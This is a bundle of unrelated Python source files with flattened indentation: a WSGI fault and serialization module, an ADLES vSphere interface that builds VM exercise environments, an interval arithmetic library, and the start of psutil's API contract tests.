# an argument whose name is 'request'
return controller_method(request=request, **action_args)
except TypeError as exc:
LOG.exception(exc)
return Fault(webob.exc.HTTPBadRequest())
def _default_body_function(wrapped_exc):
code = wrapped_exc.status_int
fault_data = {
'Error': {
'code': code,
'message': wrapped_exc.explanation}}
# 'code' is an attribute on the fault tag itself
metadata = {'attributes': {'Error': 'code'}}
return fault_data, metadata
class Fault(webob.exc.HTTPException):
"""Generates an HTTP response from a webob HTTP exception."""
def __init__(self, exception, body_function=None):
"""Creates a Fault for the given webob.exc.exception."""
self.wrapped_exc = exception
self.status_int = self.wrapped_exc.status_int
self._body_function = body_function or _default_body_function
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Generate a WSGI response based on the exception passed to ctor."""
# Replace the body with fault details.
fault_data, metadata = self._body_function(self.wrapped_exc)
content_type = req.best_match_content_type()
serializer = {
'application/json': JSONDictSerializer(),
}[content_type]
self.wrapped_exc.body = serializer.serialize(fault_data)
self.wrapped_exc.content_type = content_type
return self.wrapped_exc
# NOTE(salvatore-orlando): this class will go once the
# extension API framework is updated
class Controller(object):
"""WSGI app that dispatched to methods.
WSGI app that reads routing information supplied by RoutesMiddleware
and calls the requested action method upon itself. All action methods
must, in addition to their normal parameters, accept a 'req' argument
which is the incoming wsgi.Request. They raise a webob.exc exception,
or return a dict which will be serialized by requested content type.
"""
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Call the method specified in req.environ by RoutesMiddleware."""
arg_dict = req.environ['wsgiorg.routing_args'][1]
action = arg_dict['action']
method = getattr(self, action)
del arg_dict['controller']
del arg_dict['action']
if 'format' in arg_dict:
del arg_dict['format']
arg_dict['request'] = req
result = method(**arg_dict)
if isinstance(result, dict) or result is None:
if result is None:
status = 204
content_type = ''
body = None
else:
status = 200
content_type = req.best_match_content_type()
body = self._serialize(result, content_type)
response = webob.Response(status=status,
content_type=content_type,
body=body)
LOG.debug("%(url)s returned with HTTP %(status)d",
dict(url=req.url, status=response.status_int))
return response
else:
return result
def _serialize(self, data, content_type):
"""Serialize the given dict to the provided content_type.
Uses self._serialization_metadata if it exists, which is a dict mapping
MIME types to information needed to serialize to that type.
"""
_metadata = getattr(type(self), '_serialization_metadata', {})
serializer = Serializer(_metadata)
try:
return serializer.serialize(data, content_type)
except exception.InvalidContentType:
msg = _('The requested content type %s is invalid.') % content_type
raise webob.exc.HTTPNotAcceptable(msg)
def _deserialize(self, data, content_type):
"""Deserialize the request body to the specefied content type.
Uses self._serialization_metadata if it exists, which is a dict mapping
MIME types to information needed to serialize to that type.
"""
_metadata = getattr(type(self), '_serialization_metadata', {})
serializer = Serializer(_metadata)
return serializer.deserialize(data, content_type)['body']
# NOTE(salvatore-orlando): this class will go once the
# extension API framework is updated
class Serializer(object):
"""Serializes and deserializes dictionaries to certain MIME types."""
def __init__(self, metadata=None):
"""Create a serializer based on the given WSGI environment.
'metadata' is an optional dict mapping MIME types to information
needed to serialize a dictionary to that type.
"""
self.metadata = metadata or {}
def _get_serialize_handler(self, content_type):
handlers = {
'application/json': JSONDictSerializer(),
}
try:
return handlers[content_type]
except Exception:
raise exception.InvalidContentType(content_type=content_type)
def serialize(self, data, content_type):
"""Serialize a dictionary into the specified content type."""
return self._get_serialize_handler(content_type).serialize(data)
def deserialize(self, datastring, content_type):
"""Deserialize a string to a dictionary.
The string must be in the format of a supported MIME type.
"""
try:
return self.get_deserialize_handler(content_type).deserialize(
datastring)
except Exception:
raise webob.exc.HTTPBadRequest(_("Could not deserialize data"))
def get_deserialize_handler(self, content_type):
handlers = {
'application/json': JSONDeserializer(),
}
try:
return handlers[content_type]
except Exception:
raise exception.InvalidContentType(content_type=content_type)
|
|
import logging
import os
from adles.interfaces import Interface
from adles.utils import get_vlan, pad, read_json
from adles.vsphere import Vsphere
from adles.vsphere.folder_utils import format_structure
from adles.vsphere.network_utils import create_portgroup
from adles.vsphere.vm import VM
from adles.vsphere.vsphere_utils import VsphereException, is_folder, is_vm
class VsphereInterface(Interface):
"""Generic interface for the VMware vSphere platform."""
def __init__(self, infra, spec):
"""
.. warning:: The infrastructure and spec are assumed to be valid,
therefore checks on key existence and types are NOT performed
for REQUIRED elements.
:param dict infra: Infrastructure information
:param dict spec: The parsed exercise specification
"""
super(VsphereInterface, self).__init__(infra=infra, spec=spec)
self._log = logging.getLogger(str(self.__class__))
self._log.debug("Initializing %s", self.__class__)
self.master_folder = None
self.template_folder = None
# Used to do lookups of Generic networks during deployment
self.net_table = {}
# Cache containing Master instances (TODO: potential naming conflicts)
self.masters = {}
if "thresholds" in infra:
self.thresholds = infra["thresholds"]
else:
self.thresholds = {
"folder": {
"warn": 25,
"error": 50},
"service": {
"warn": 50,
"error": 70}
}
# Read infrastructure login information
if "login-file" in infra:
logins = read_json(infra["login-file"])
else:
self._log.warning("No login-file specified, "
"defaulting to user prompts...")
logins = {}
# Instantiate the vSphere vCenter server instance class
self.server = Vsphere(username=logins.get("user"),
password=logins.get("pass"),
hostname=infra.get("hostname"),
port=int(infra.get("port")),
datastore=infra.get("datastore"),
datacenter=infra.get("datacenter"))
# Acquire ESXi hosts
if "hosts" in infra:
hosts = infra["hosts"]
self.host = self.server.get_host(hosts[0])
# Gather all the ESXi hosts
self.hosts = [self.server.get_host(h) for h in hosts]
else:
self.host = self.server.get_host() # First host found in Datacenter
# Instantiate and initialize Groups
self.groups = self._init_groups()
# Set the server root folder
if "server-root" in infra:
self.server_root = self.server.get_folder(infra["server-root"])
if not self.server_root:
self._log.error("Could not find server-root folder '%s'",
infra["server-root"])
raise VsphereException("Could not find server root folder")
else: # Default to Datacenter VM folder
self.server_root = self.server.datacenter.vmFolder
self._log.info("Server root folder: %s", self.server_root.name)
# Set environment root folder (TODO: this can be consolidated)
if "folder-name" not in self.metadata:
self.root_path, self.root_name = ("", self.metadata["name"])
self.root_folder = self.server_root.traverse_path(self.root_name,
generate=True)
else:
self.root_path, self.root_name = os.path.split(
self.metadata["folder-name"])
self.root_folder = self.server_root.traverse_path(
self.metadata["folder-name"], generate=True)
self._log.debug("Environment root folder name: %s", self.root_name)
if not self.root_folder: # Create if it's not found
parent = self.server_root.traverse_path(self.root_path)
self.root_folder = self.server.create_folder(self.root_name, parent)
if not self.root_folder:
self._log.error("Could not create root folder '%s'",
self.root_name)
raise VsphereException("Could not create root folder")
self._log.info("Environment root folder: %s", self.root_folder.name)
# Set default vSwitch name
if "vswitch" in infra:
self.vswitch_name = infra["vswitch"]
else:
from pyVmomi import vim
self.vswitch_name = self.server.get_item(vim.Network).name
self._log.debug("Finished initializing VsphereInterface")
def _init_groups(self):
"""
Instantiate and initialize Groups.
:return: Initialized Groups
:rtype: dict(:class:`Group`)
"""
from adles.group import Group, get_ad_groups
groups = {}
# Instantiate Groups
for name, config in self.spec["groups"].items():
if "instances" in config: # Template groups
groups[name] = [Group(name, config, i)
for i in range(1, config["instances"] + 1)]
else: # Standard groups
groups[name] = Group(name=name, group=config)
# Initialize Active Directory-type Group user names
ad_groups = get_ad_groups(groups)
for group in ad_groups:
# res = self.server.get_users(belong_to_group=g.ad_group,
# find_users=True)
res = None
if res is not None:
for result in res:
# Reference: pyvmomi/docs/vim/UserSearchResult.rst
if result.group is True:
self._log.error("Result '%s' is not a user",
str(result))
else:
group.users.append(result.principal)
# Set the size, default to 1
group.size = (len(group.users) if len(group.users) > 1 else 1)
else:
self._log.error("Could not initialize AD-group %s",
str(group.ad_group))
if hasattr(self.server.user_dir, "domainList"):
self._log.debug("Domains on server: %s",
str(self.server.user_dir.domainList))
return groups
def create_masters(self):
""" Exercise Environment Master creation phase. """
# Get folder containing templates
self.template_folder = self.server_root.traverse_path(
self.infra["template-folder"])
if not self.template_folder:
self._log.error("Could not find template folder in path '%s'",
self.infra["template-folder"])
return
else:
self._log.debug("Found template folder: '%s'",
self.template_folder.name)
# Create master folder to hold base service instances
self.master_folder = self.root_folder.traverse_path(
self.master_root_name)
if not self.master_folder:
self.master_folder = self.server.create_folder(
self.master_root_name, self.root_folder)
self._log.info("Created Master folder '%s' in '%s'",
self.master_root_name, self.root_name)
# Create networks for master instances
for net in self.networks:
# Iterate through the base network types (unique and generic)
self._create_master_networks(net_type=net, default_create=True)
# Create Master instances
self._master_parent_folder_gen(self.folders, self.master_folder)
# Output fully deployed master folder tree to debugging
self._log.debug(format_structure(self.root_folder.enumerate()))
def _master_parent_folder_gen(self, folder, parent):
"""
Generates parent-type Master folders.
:param dict folder: Dict with the folder tree structure as in spec
:param parent: Parent folder
:type parent: vim.Folder
"""
skip_keys = ["instances", "description", "enabled"]
if not self._is_enabled(folder): # Check if disabled
self._log.warning("Skipping disabled parent-type folder %s",
parent.name)
return
# We have to check every item, as they could be keywords or sub-folders
for sub_name, sub_value in folder.items():
if sub_name in skip_keys:
# Skip configurations that are not relevant
continue
elif sub_name == "group":
pass # group = self._get_group(sub_value)
elif sub_name == "master-group":
pass # master_group = self._get_group(sub_value)
else:
folder_name = self.master_prefix + sub_name
new_folder = self.server.create_folder(folder_name,
create_in=parent)
if "services" in sub_value: # It's a base folder
if self._is_enabled(sub_value):
self._log.info("Generating Master base-type folder %s",
sub_name)
self._master_base_folder_gen(sub_name, sub_value,
new_folder)
else:
self._log.warning("Skipping disabled "
"base-type folder %s", sub_name)
else: # It's a parent folder, recurse
if self._is_enabled(sub_value):
self._master_parent_folder_gen(sub_value,
parent=new_folder)
self._log.info("Generating Master "
"parent-type folder %s", sub_name)
else:
self._log.warning("Skipping disabled "
"parent-type folder %s", sub_name)
def _master_base_folder_gen(self, folder_name, folder_dict, parent):
"""
Generates base-type Master folders.
:param str folder_name: Name of the base folder
:param dict folder_dict: Dict with the base folder tree as in spec
:param parent: Parent folder
:type parent: vim.Folder
"""
# Set the group to apply permissions for
# if "master-group" in folder_dict:
# master_group = self._get_group(folder_dict["master-group"])
# else:
# master_group = self._get_group(folder_dict["group"])
# Create Master instances
for sname, sconfig in folder_dict["services"].items():
if not self._is_vsphere(sconfig["service"]):
self._log.debug("Skipping non-vsphere service '%s'", sname)
continue
self._log.info("Creating Master instance '%s' from service '%s'",
sname, sconfig["service"])
vm = self._create_service(parent, sconfig["service"],
sconfig["networks"])
if vm is None:
self._log.error("Failed to create Master instance '%s' "
"in folder '%s'", sname, folder_name)
continue # Skip to the next service
def _create_service(self, folder, service_name, networks):
"""
Retrieves and clones a service into a master folder.
:param folder: Folder to create service in
:type folder: vim.Folder
:param str service_name: Name of the service to clone
:param list networks: Networks to configure the service with
:return: The service VM instance
:rtype: :class:`VM`
"""
if not self._is_vsphere(service_name):
self._log.debug("Skipping non-vsphere service '%s'", service_name)
return None
config = self.services[service_name]
vm_name = self.master_prefix + service_name
test = folder.traverse_path(vm_name) # Check service already exists
if test is None:
# Find the template that matches the service definition
template = self.template_folder.traverse_path(config["template"])
if not template:
self._log.error("Could not find template '%s' for service '%s'",
config["template"], service_name)
return None
self._log.info("Creating service '%s'", service_name)
vm = VM(name=vm_name, folder=folder,
resource_pool=self.server.get_pool(),
datastore=self.server.datastore, host=self.host)
if not vm.create(template=template):
return None
else:
self._log.warning("Service %s already exists", service_name)
vm = VM(vm=test)
if vm.is_template(): # Check if it's been converted already
self._log.warning("Service %s is a Template, "
"skipping configuration", service_name)
return vm
# Resource configurations (minus storage currently)
if "resource-config" in config:
vm.edit_resources(**config["resource-config"])
if "note" in config: # Set VM note if specified
vm.set_note(config["note"])
# NOTE: management interfaces matter here!
# (If implemented with Monitoring extensions)
self._configure_nics(vm, networks=networks) # Configure VM NICs
# Post-creation snapshot
vm.create_snapshot("Start of Mastering",
"Beginning of Mastering phase for exercise %s",
self.metadata["name"])
return vm
def _create_master_networks(self, net_type, default_create):
"""
Creates a network as part of the Master creation phase.
:param str net_type: Top-level type of the network
(unique | generic | base)
:param bool default_create: Whether to create networks
if they don't already exist
"""
# Pick up any recent changes to the host's network status
self.host.configManager.networkSystem.RefreshNetworkSystem()
self._log.info("Creating %s", net_type)
for name, config in self.networks[net_type].items():
exists = self.server.get_network(name)
if exists:
self._log.info("PortGroup '%s' already exists on host '%s'",
name, self.host.name)
else: # NOTE: if monitoring, we want promiscuous=True
self._log.warning("PortGroup '%s' does not exist on host '%s'",
name, self.host.name)
if default_create:
self._log.info("Creating portgroup '%s' on host '%s'",
name, self.host.name)
create_portgroup(name=name, host=self.host,
promiscuous=False,
vlan=int(config.get("vlan",
next(get_vlan()))),
vswitch_name=config.get("vswitch",
self.vswitch_name))
def _configure_nics(self, vm, networks, instance=None):
"""
Configures Virtual Network Interfaces Cards (vNICs)
for a service instance.
:param vm: Virtual Machine to configure vNICs on
:type vm: vim.VirtualMachine
:param list networks: List of networks to configure
:param int instance: Current instance of a folder
for Deployment purposes
"""
self._log.info("Editing NICs for VM '%s'", vm.name)
num_nics = len(list(vm.network))
num_nets = len(networks)
nets = networks # Copy the passed variable so we can edit it later
# Ensure number of NICs on VM
# matches number of networks configured for the service
#
# Note that monitoring interfaces will be
# counted and included in the networks list
if num_nics > num_nets: # Remove excess interfaces
diff = int(num_nics - num_nets)
self._log.debug("VM '%s' has %d extra NICs, removing...",
vm.name, diff)
for _, nic in enumerate(reversed(range(num_nics)), start=1):
vm.remove_nic(nic)
elif num_nics < num_nets: # Create missing interfaces
diff = int(num_nets - num_nics)
self._log.debug("VM '%s' is deficient %d NICs, adding...",
vm.name, diff)
# Add NICs to VM and pop them from the list of networks
for _ in range(diff):
# Select NIC hardware
nic_model = ("vmxnet3" if vm.has_tools() else "e1000")
net_name = nets.pop()
vm.add_nic(network=self.server.get_network(net_name),
model=nic_model, summary=net_name)
# Edit the interfaces
# (NOTE: any NICs added earlier shouldn't be affected by this)
for i, net_name in enumerate(networks, start=1):
# Setting the summary to network name
# allows viewing of name without requiring
# read permissions to the network itself
if instance is not None:
# Resolve generic networks for deployment phase
net_name = self._get_net(net_name, instance)
network = self.server.get_network(net_name)
if vm.get_nic_by_id(i).backing.network == network:
continue # Skip NICs that are already configured
else:
vm.edit_nic(nic_id=i, network=network, summary=net_name)
def deploy_environment(self):
""" Exercise Environment deployment phase """
self.master_folder = self.root_folder.traverse_path(
self.master_root_name)
if self.master_folder is None: # Check if Master folder was found
self._log.error("Could not find Master folder '%s'. "
"Please ensure the Master Creation phase "
"has been run and the folder exists "
"before attempting Deployment",
self.master_root_name)
raise VsphereException("Could not find Master folder")
self._log.debug("Master folder name: %s\tPrefix: %s",
self.master_folder.name, self.master_prefix)
# Verify and convert Master instances to templates
self._log.info("Validating and converting Masters to Templates")
self._convert_and_verify(folder=self.master_folder)
self._log.info("Finished validating "
"and converting Masters to Templates")
self._log.info("Deploying environment...")
self._deploy_parent_folder_gen(spec=self.folders,
parent=self.root_folder,
path="")
self._log.info("Finished deploying environment")
# Output fully deployed environment tree to debugging
self._log.debug(format_structure(self.root_folder.enumerate()))
def _convert_and_verify(self, folder):
"""
Converts Masters to Templates before deployment.
This also ensures they are powered off before being cloned.
:param folder: Folder containing Master instances to convert and verify
:type folder: vim.Folder
"""
self._log.debug("Converting Masters in folder '%s' to templates",
folder.name)
for item in folder.childEntity:
if is_vm(item):
vm = VM(vm=item)
self.masters[vm.name] = vm
if vm.is_template():
# Skip if they already exist from a previous run
self._log.debug("Master '%s' is already a template",
vm.name)
continue
# Cleanly power off VM before converting to template
if vm.powered_on():
vm.change_state("off", attempt_guest=True)
# Take a snapshot to allow reverts to the start of the exercise
vm.create_snapshot("Start of exercise",
"Beginning of deployment phase, "
"post-master configuration")
# Convert Master instance to Template
vm.convert_template()
if not vm.is_template():
self._log.error("Master '%s' did not convert to Template",
vm.name)
else:
self._log.debug("Converted Master '%s' to Template",
vm.name)
elif is_folder(item): # Recurse into sub-folders
self._convert_and_verify(item)
else:
self._log.debug("Unknown item found while "
"templatizing Masters: %s", str(item))
def _deploy_parent_folder_gen(self, spec, parent, path):
"""
Generates parent-type folder trees.
:param dict spec: Dict with folder specification
:param parent: Parent folder
:type parent: vim.Folder
:param str path: Folders path at the current level
"""
skip_keys = ["instances", "description", "master-group", "enabled"]
if not self._is_enabled(spec): # Check if disabled
self._log.warning("Skipping disabled parent-type folder %s",
parent.name)
return
for sub_name, sub_value in spec.items():
if sub_name in skip_keys:
# Skip configurations that are not relevant
continue
elif sub_name == "group": # Configure group
pass # group = self._get_group(sub_value)
else: # Create instances of the parent folder
self._log.debug("Deploying parent-type folder '%s'", sub_name)
num_instances, prefix = self._instances_handler(spec,
sub_name,
"folder")
for i in range(num_instances):
# If prefix is undefined or there's a single instance,
# use the folder's name
instance_name = (sub_name
if prefix == "" or num_instances == 1
else prefix)
# If multiple instances, append padded instance number
instance_name += (pad(i) if num_instances > 1 else "")
# Create a folder for the instance
new_folder = self.server.create_folder(instance_name,
create_in=parent)
if "services" in sub_value: # It's a base folder
if self._is_enabled(sub_value):
self._deploy_base_folder_gen(folder_name=sub_name,
folder_items=sub_value,
parent=new_folder,
path=self._path(
path, sub_name))
else:
self._log.warning("Skipping disabled "
"base-type folder %s", sub_name)
else: # It's a parent folder
if self._is_enabled(sub_value):
self._deploy_parent_folder_gen(parent=new_folder,
spec=sub_value,
path=self._path(
path, sub_name))
else:
self._log.warning("Skipping disabled "
"parent-type folder %s", sub_name)
def _deploy_base_folder_gen(self, folder_name, folder_items, parent, path):
"""
Generates folder tree for deployment stage.
:param str folder_name: Name of the folder
:param dict folder_items: Dict of items in the folder
:param parent: Parent folder
:type parent: vim.Folder
:param str path: Folders path at the current level
"""
# Set the group to apply permissions for
# group = self._get_group(folder_items["group"])
# Check if number of instances for the folder exceeds configured limits
num_instances, prefix = self._instances_handler(folder_items,
folder_name, "folder")
# Create instances
self._log.info("Deploying base-type folder '%s'", folder_name)
for i in range(num_instances):
# If no prefix is defined or there's only a single instance,
# use the folder's name
instance_name = (folder_name
if prefix == "" or num_instances == 1
else prefix)
# If multiple instances, append padded instance number
instance_name += (pad(i) if num_instances > 1 else "")
if num_instances > 1: # Create a folder for the instance
new_folder = self.server.create_folder(instance_name,
create_in=parent)
else: # Don't duplicate folder name for single instances
new_folder = parent
# Use the folder's name for the path,
# as that's what matches the Master version
self._log.info("Generating services for "
"base-type folder instance '%s'", instance_name)
self._deploy_gen_services(services=folder_items["services"],
parent=new_folder,
path=path, instance=i)
def _deploy_gen_services(self, services, parent, path, instance):
"""
Generates the services in a folder.
:param dict services: The "services" dict in a folder
:param parent: Parent folder
:type parent: vim.Folder
:param str path: Folders path at the current level
:param int instance: What instance of a base folder this is
"""
# Iterate through the services
for service_name, value in services.items():
if not self._is_vsphere(value["service"]):
# Ignore non-vsphere services
self._log.debug("Skipping non-vsphere service '%s'",
service_name)
continue
self._log.info("Generating service '%s' in folder '%s'",
service_name, parent.name)
# Check if number of instances for service exceeds configured limits
num_instances, prefix = self._instances_handler(value,
service_name,
"service")
# Get the Master template instance to clone from
master = self.masters.get(self.master_prefix + value["service"],
None)
if master is None: # Check if the lookup was successful
self._log.error("Couldn't find Master for service '%s' "
"in this path:\n%s", value["service"], path)
continue # Skip to the next service
# Clone the instances of the service from the master
for i in range(num_instances):
instance_name = prefix + service_name + (" " + pad(i)
if num_instances > 1
else "")
vm = VM(name=instance_name, folder=parent,
resource_pool=self.server.get_pool(),
datastore=self.server.datastore, host=self.host)
if not vm.create(template=master.get_vim_vm()):
self._log.error("Failed to create instance %s",
instance_name)
else:
self._configure_nics(vm, value["networks"],
instance=instance)
def _is_vsphere(self, service_name):
"""
Checks if a service instance is defined as a vSphere service.
:param str service_name: Name of the service to lookup in
list of defined services
:return: If a service is a vSphere-type service
:rtype: bool
"""
if service_name not in self.services:
self._log.error("Could not find service %s in list of services",
service_name)
elif "template" in self.services[service_name]:
return True
return False
def _get_net(self, name, instance=-1):
"""
Resolves network names. This is mainly to handle generic-type networks.
If a generic network does not exist, it is created and added to
the interface lookup table.
:param str name: Name of the network
:param int instance: Instance number
.. note:: Only applies to generic-type networks
:return: Resolved network name
:rtype: str
"""
net_type = self._determine_net_type(name)
if net_type == "unique-networks":
return name
elif net_type == "generic-networks":
if instance == -1:
self._log.error("Invalid instance for _get_net: %d", instance)
raise ValueError
# Generate full name for the generic network
net_name = name + "-GENERIC-" + pad(instance)
if net_name not in self.net_table:
exists = self.server.get_network(net_name)
if exists is not None:
self._log.debug("PortGroup '%s' already exists "
"on host '%s'", net_name,
self.host.name)
else: # Create the generic network if it does not exist
# WARNING: lookup of name is case-sensitive!
# This can (and has0 lead to bugs
self._log.debug("Creating portgroup '%s' on host '%s'",
net_name,
self.host.name)
vsw = self.networks["generic-networks"][name].get(
"vswitch", self.vswitch_name)
create_portgroup(name=net_name,
host=self.host,
promiscuous=False,
vlan=next(get_vlan()),
vswitch_name=vsw)
# Register the existence of the generic network
self.net_table[net_name] = True
return net_name
else:
self._log.error("Invalid network type %s for network %s",
net_type, name)
raise TypeError
def cleanup_masters(self, network_cleanup=False):
"""
Cleans up any master instances.
:param bool network_cleanup: If networks should be cleaned up
"""
# Get the folder to cleanup in
master_folder = self.root_folder.find_in(self.master_root_name)
self._log.info("Found master folder '%s' under folder '%s', "
"proceeding with cleanup...",
master_folder.name, self.root_folder.name)
# Recursively descend from master folder,
# destroying anything with the prefix
master_folder.cleanup(vm_prefix=self.master_prefix,
recursive=True,
destroy_folders=True,
destroy_self=True)
# Cleanup networks
if network_cleanup:
pass
def cleanup_environment(self, network_cleanup=False):
"""
Cleans up a deployed environment.
:param bool network_cleanup: If networks should be cleaned up
"""
# Get the root environment folder to cleanup in
# enviro_folder = self.root_folder
# Cleanup networks
if network_cleanup:
pass
def __str__(self):
return str(self.server) + str(self.groups) + str(self.hosts)
def __eq__(self, other):
return super(self.__class__, self).__eq__(other) and \
self.server == other.server and \
self.groups == other.groups and \
self.hosts == other.hosts
|
|
'''
interval.py - Deal with intervals.
author: Xiao-Ou Zhang <[email protected]>
version: 1.0
'''
import copy
class Interval(object):
'''
Class: Interval
Maintainer: Xiao-Ou Zhang
Version: 1.0
Usage: a = Interval(list)
(nested list: [[x,x,f1...],[x,x,f2...]...] / [[x,x],[x,x]...] or
simple list: [x,x,f1...] / [x,x])
Notes: all the intervals in the list will become mutually exclusive and
be sorted after instantiation.
For example: input: [[1, 10, 'a'], [17, 22, 'b'], [7, 12, 'c'], [20, 25, 'd'], [30, 35, 'e']]
output: [[1, 12, 'a', 'c'], [17, 25, 'b', 'd'], [30, 35, 'e']]
Attributes: interval
Functions: c = a + b or a += b
c = b + a
c = a * b or a *= b
c = b * a
c = a - b or a -= b
c = b - a
a[n] or a[n:m]
[x, x] in a or [[x, x], [x, x]] not in a
a.complement(sta, end)
a.extractwith(b)
a.extractwithout(b)
mapto(interval, index) -> interval
overlapwith(index, interval) -> index
'''
def __init__(self, interval, instance_flag=0):
self.interval = [[int(i[0]), int(i[1])] + i[2:]
for i in Interval.__convert(interval)]
if not self.interval:
return
if not instance_flag:
self.interval.sort()
tmp = []
a = self.interval[0]
for b in self.interval[1:]:
if a[1] <= b[0]:
tmp.append(a)
a = b
else:
a[1] = b[1] if b[1] > a[1] else a[1]
a.extend(b[2:])
tmp.append(a)
self.interval = tmp
def __add__(self, interval):
'''
Usage: c = a + b or a += b
extract union intervals, 'a' should be instance.
'''
tmp = copy.deepcopy(self.interval)
if isinstance(interval, Interval):
tmp.extend(interval.interval)
else:
tmp.extend(Interval.__convert(interval))
return Interval(tmp)
def __radd__(self, interval):
'''
Usage: c = b + a
extract union intervals, 'a' should be instance.
'''
return self.__add__(interval)
def __mul__(self, interval, real_flag=1):
'''
Usage: c = a * b or a *= b
extract intersection intervals, 'a' should be instance.
'''
tmp = []
tmp1 = self.interval
if isinstance(interval, Interval):
tmp2 = interval.interval
else:
tmp2 = Interval(interval).interval
if not tmp1 or not tmp2:
return Interval([])
a, b = tmp1[0], tmp2[0]
i, j = 1, 1
while True:
sta = a[0] if a[0] > b[0] else b[0]
end = a[1] if a[1] < b[1] else b[1]
if sta < end:
if real_flag:
tmp.append([sta, end] + a[2:] + b[2:])
else:
tmp.append(copy.copy(a))
if a[1] == end:
if i == len(tmp1):
break
a = tmp1[i]
i += 1
if b[1] == end:
if j == len(tmp2):
break
b = tmp2[j]
j += 1
return Interval(tmp, 1)
def __rmul__(self, interval):
'''
Usage: c = b * a
extract intersection intervals, 'a' should be instance.
'''
return self.__mul__(interval)
def __sub__(self, interval, real_flag=1):
'''
Usage: c = a - b or a -= b
extract difference intervals, 'a' should be instance.
'''
if not self.interval:
return Interval([])
if isinstance(interval, Interval):
tmp = copy.deepcopy(interval)
else:
tmp = Interval(interval)
if not tmp:
return copy.deepcopy(self)
if self.interval[0][0] < tmp.interval[0][0]:
sta = self.interval[0][0]
else:
sta = tmp.interval[0][0]
if self.interval[-1][1] > tmp.interval[-1][1]:
end = self.interval[-1][1]
else:
end = tmp.interval[-1][1]
tmp.complement(sta, end)
return self.__mul__(tmp, real_flag)
def __rsub__(self, interval):
'''
Usage: c = b - a
extract difference intervals, 'a' should be instance.
'''
if isinstance(interval, Interval):
tmp = copy.deepcopy(interval)
else:
tmp = Interval(interval)
if not self.interval:
return tmp
if not tmp:
return Interval([])
if self.interval[0][0] < tmp.interval[0][0]:
sta = self.interval[0][0]
else:
sta = tmp.interval[0][0]
if self.interval[-1][1] > tmp.interval[-1][1]:
end = self.interval[-1][1]
else:
end = tmp.interval[-1][1]
tmp_a = copy.deepcopy(self)
tmp_a.complement(sta, end)
return Interval.__mul__(tmp, tmp_a)
def __getitem__(self, index):
'''
Usage: a[n] or a[n:m]
intercept index and slice on interval objects.
'''
return self.interval[index]
def __repr__(self):
'''
print objects.
'''
return repr(self.interval)
def __contains__(self, interval):
'''
Usage: [x, x] in a or [[x, x], [x, x]] not in a
judge whether interval is in a or not, 'a' should be instance.
'''
tmp = self.__mul__(interval).interval
if tmp:
return True
else:
return False
def complement(self, sta='#', end='#'):
'''
Usage: a.complement(sta, end)
complement of 'a'.
'''
tmp = []
if sta != '#' and sta < self.interval[0][0]:
tmp.append([sta, self.interval[0][0]])
a = self.interval[0][1]
for item in self.interval[1:]:
b = item[0]
if a != b:
tmp.append([a, b])
a = item[1]
if end != '#' and end > a:
tmp.append([a, end])
self.interval = tmp
def extractwith(self, interval):
'''
Usage: a.extractwith(b)
extract intervals in 'b'.
'''
self.interval = self.__mul__(interval, 0).interval
def extractwithout(self, interval):
'''
Usage: a.extractwithout(b)
extract intervals not in 'b'.
'''
self.interval = self.__sub__(interval, 0).interval
@staticmethod
def mapto(interval, index):
'''
mapto(interval, index) -> interval
Map interval onto index.
'''
tmp1 = Interval.__init(interval)
tmp2 = Interval.__init(index)
return Interval.__map(tmp2, tmp1, flag=1)
@staticmethod
def overlapwith(index, interval):
'''
overlapwith(index, interval) -> index
Overlap index with interval.
'''
tmp1 = Interval.__init(index)
tmp2 = Interval.__init(interval)
return Interval.__map(tmp1, tmp2, flag=0)
@staticmethod
def __convert(interval):
assert type(interval) is list, 'the type you use is {}'.format(type(interval))
if not interval:
return interval
if type(interval[0]) is list:
return interval
else:
return [interval]
@staticmethod
def __init(interval):
mapping = [[int(i[0]), int(i[1])] + i[2:] for i in Interval.__convert(interval)]
mapping.sort()
return mapping
@staticmethod
def __map(index, interval, flag):
mapped_fragment = []
tmp_fragment = []
if not interval:
if flag:
return mapped_fragment
else:
return index
for dex in index:
dex_info = dex[2:]
while True:
try:
fragment = interval.pop(0)
except IndexError:
if tmp_fragment:
interval.extend(tmp_fragment)
tmp_fragment = []
continue
else:
if flag:
return mapped_fragment
else:
return index
if fragment[0] >= dex[1]:
interval.insert(0, fragment)
interval[0:0] = tmp_fragment
tmp_fragment = []
break
elif dex[0] < fragment[1] and dex[1] > fragment[0]:
dex += fragment[2:]
sta = dex[0] if dex[0] > fragment[0] else fragment[0]
end = dex[1] if dex[1] < fragment[1] else fragment[1]
new_fragment = [sta, end] + fragment[2:] + dex_info
mapped_fragment.append(new_fragment)
if fragment[1] > dex[1]:
tmp_fragment.append([dex[1],
fragment[1]] + fragment[2:])
else:
if flag:
return mapped_fragment
else:
return index
|
|
#!/usr/bin/env python3
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Contracts tests. These tests mainly check API sanity in terms of
returned types and APIs availability.
Some of these are duplicates of tests test_system.py and test_process.py
"""
import errno
import multiprocessing
import os
import signal
import stat
import sys
import time
import traceback
import psutil
from psutil import AIX
from psutil import BSD
from psutil import FREEBSD
from psutil import LINUX
from psutil import MACOS
from psutil import NETBSD
from psutil import OPENBSD
from psutil import OSX
from psutil import POSIX
from psutil import SUNOS
from psutil import WINDOWS
from psutil._compat import FileNotFoundError
from psutil._compat import long
from psutil._compat import range
from psutil.tests import APPVEYOR
from psutil.tests import CI_TESTING
from psutil.tests import GITHUB_ACTIONS
from psutil.tests import HAS_CPU_FREQ
from psutil.tests import HAS_NET_IO_COUNTERS
from psutil.tests import HAS_SENSORS_FANS
from psutil.tests import HAS_SENSORS_TEMPERATURES
from psutil.tests import PYPY
from psutil.tests import SKIP_SYSCONS
from psutil.tests import VALID_PROC_STATUSES
from psutil.tests import PsutilTestCase
from psutil.tests import check_connection_ntuple
from psutil.tests import create_sockets
from psutil.tests import enum
from psutil.tests import is_namedtuple
from psutil.tests import kernel_version
from psutil.tests import process_namespace
from psutil.tests import serialrun
from psutil.tests import unittest
# ===================================================================
# --- APIs availability
# ===================================================================
# Make sure code reflects what doc promises in terms of APIs
# availability.
class TestAvailConstantsAPIs(PsutilTestCase):
def test_PROCFS_PATH(self):
self.assertEqual(hasattr(psutil, "PROCFS_PATH"),
LINUX or SUNOS or AIX)
def test_win_priority(self):
ae = self.assertEqual
